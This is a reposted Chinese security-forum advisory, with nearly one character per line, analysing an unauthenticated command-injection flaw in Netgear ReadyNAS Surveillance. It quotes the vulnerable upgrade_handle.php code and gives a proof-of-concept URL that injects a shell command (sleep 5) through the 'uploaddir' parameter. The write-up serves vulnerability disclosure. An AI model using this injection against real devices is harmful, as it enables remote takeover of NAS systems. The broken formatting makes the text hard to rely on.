论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[11851] 2017-10-02_美国网件ReadyNAS监控系统非认证远程命令执行漏洞分析
文档创建者:
s7ckTeam
浏览次数:
16
最后更新:
2025-01-18
漏洞
16 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-10-02_美国网件ReadyNAS监控系统非认证远程命令执行漏洞分析
美
国
网
件
R
e
a
d
y
N
A
S
监
控
系
统
非
认
证
远
程
命
令
执
行
漏
洞
分
析
a
n
g
0
1
0
e
l
a
F
r
e
e
B
u
f
2
0
1
7
-
1
0
-
0
2
背
景
背
景
R
e
a
d
y
N
A
S
监
控
系
统
是
网
件
公
司
提
出
的
可
直
接
在
监
控
系
统
是
网
件
公
司
提
出
的
可
直
接
在
R
e
a
d
y
N
A
S
存
储
设
备
上
安
装
的
,
简
单
易
用
的
网
络
视
频
记
录
软
件
。
安
装
一
些
连
网
的
摄
像
头
,
监
控
系
统
就
可
以
运
行
了
。
存
储
设
备
上
安
装
的
,
简
单
易
用
的
网
络
视
频
记
录
软
件
。
安
装
一
些
连
网
的
摄
像
头
,
监
控
系
统
就
可
以
运
行
了
。
漏
洞
描
述
漏
洞
描
述
网
件
公
司
的
R
e
a
d
y
N
A
S
监
控
系
统
发
现
有
非
认
证
的
远
程
命
令
执
行
漏
洞
。
传
递
给
u
p
g
r
a
d
e
_
h
a
n
d
l
e
.
p
h
p
的
用
户
输
入
没
有
进
行
严
格
的
过
滤
。
{
i
f
(
c
o
n
s
t
a
n
t
(
"
N
E
E
D
_
U
P
L
O
A
D
_
F
R
O
M
_
D
I
S
K
"
)
)
{
i
f
(
i
s
s
e
t
(
$
_
G
E
T
[
'
u
p
l
o
a
d
d
i
r
'
]
)
)
{
$
u
p
l
o
a
d
d
i
r
=
$
_
G
E
T
[
'
u
p
l
o
a
d
d
i
r
'
]
;
$
f
p
=
f
o
p
e
n
(
U
P
L
O
A
D
_
C
O
N
F
_
P
A
T
H
,
'
w
'
)
;
$
s
t
r
D
a
t
a
=
"
s
e
r
v
e
r
.
u
p
l
o
a
d
-
d
i
r
s
=
(
"
"
.
$
u
p
l
o
a
d
d
i
r
.
"
"
)
n
"
;
f
w
r
i
t
e
(
$
f
p
,
$
s
t
r
D
a
t
a
)
;
f
c
l
o
s
e
(
$
f
p
)
;
$
c
u
r
r
e
n
t
_
d
i
r
=
s
y
s
t
e
m
(
'
c
a
t
'
.
P
H
P
_
C
I
N
F
_
P
A
T
H
.
'
|
g
r
e
p
'
u
p
l
o
a
d
_
t
m
p
_
d
i
r
'
'
)
;
$
t
m
p
_
u
p
l
o
a
d
_
d
i
r
=
'
u
p
l
o
a
d
_
t
m
p
_
d
i
r
=
'
.
$
u
p
l
o
a
d
d
i
r
;
$
c
m
d
=
"
s
e
d
-
i
'
s
/
"
.
s
t
r
_
r
e
p
l
a
c
e
(
'
/
'
,
'
/
'
,
$
c
u
r
r
e
n
t
_
d
i
r
)
.
"
/
"
.
s
t
r
_
r
e
p
l
a
c
e
(
'
/
'
,
'
/
'
,
$
t
m
p
_
u
p
l
o
a
d
_
d
i
r
)
.
"
/
g
'
"
.
P
H
P
_
C
I
N
F
_
P
A
T
H
;
/
/
s
y
s
t
e
m
(
"
e
c
h
o
"
$
u
p
l
o
a
d
d
i
r
"
>
"
.
U
P
G
R
A
D
E
_
D
I
R
_
P
A
T
H
)
;
$
f
i
l
e
=
f
o
p
e
n
(
U
P
G
R
A
D
E
_
D
I
R
_
P
A
T
H
,
"
w
"
)
;
i
f
(
$
f
i
l
e
)
f
w
r
i
t
e
(
$
f
i
l
e
,
"
[
U
P
L
O
A
D
]
n
"
)
;
f
w
r
i
t
e
(
$
f
i
l
e
,
"
u
p
l
o
a
d
_
d
i
r
=
"
"
.
$
u
p
l
o
a
d
d
i
r
.
"
"
n
"
)
;
f
c
l
o
s
e
(
$
f
i
l
e
)
;
h
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
t
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
r
n
r
n
"
)
;
e
c
h
o
"
M
o
d
i
f
y
u
p
l
o
a
d
d
i
r
e
c
t
o
r
y
o
k
"
;
从
上
面
的
代
码
中
,
我
们
可
以
看
到
$
_
G
E
T
[
‘
u
p
l
o
a
d
d
i
r
’
]
没
有
转
义
(
过
滤
)
,
就
直
接
通
过
$
t
m
p
_
u
p
l
o
a
d
_
d
i
r
传
递
给
s
y
s
t
e
m
(
)
。
e
l
s
e
i
f
(
0
=
=
s
t
r
c
m
p
(
$
_
G
E
T
[
'
c
m
d
'
]
,
'
w
r
i
t
e
u
p
l
o
a
d
d
i
r
'
)
)
通
过
发
送
下
面
的
参
数
,
就
可
以
执
行
输
入
的
命
令
'
?
c
m
d
=
w
r
i
t
e
u
p
l
o
a
d
d
i
r
&
u
p
l
o
a
d
d
i
r
=
%
2
7
;
C
O
M
M
A
N
D
_
T
O
_
E
X
E
C
U
T
E
;
%
2
7
'
P
o
C
h
t
t
p
:
/
/
I
P
/
u
p
g
r
a
d
e
_
h
a
n
d
l
e
.
p
h
p
?
c
m
d
=
w
r
i
t
e
u
p
l
o
a
d
d
i
r
&
u
p
l
o
a
d
d
i
r
=
%
2
7
;
s
l
e
e
p
%
2
0
5
;
%
2
7
厂
商
回
应
厂
商
回
应
该
漏
洞
于
6
月
2
7
日
被
通
报
给
网
件
公
司
,
但
公
司
拒
绝
透
露
相
关
技
术
细
节
以
及
修
复
的
时
间
点
。
参
考
来
源
:
h
t
t
p
s
:
/
/
b
l
o
g
s
.
s
e
c
u
r
i
t
e
a
m
.
c
o
m
/
i
n
d
e
x
.
p
h
p
/
a
r
c
h
i
v
e
s
/
3
4
0
9
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞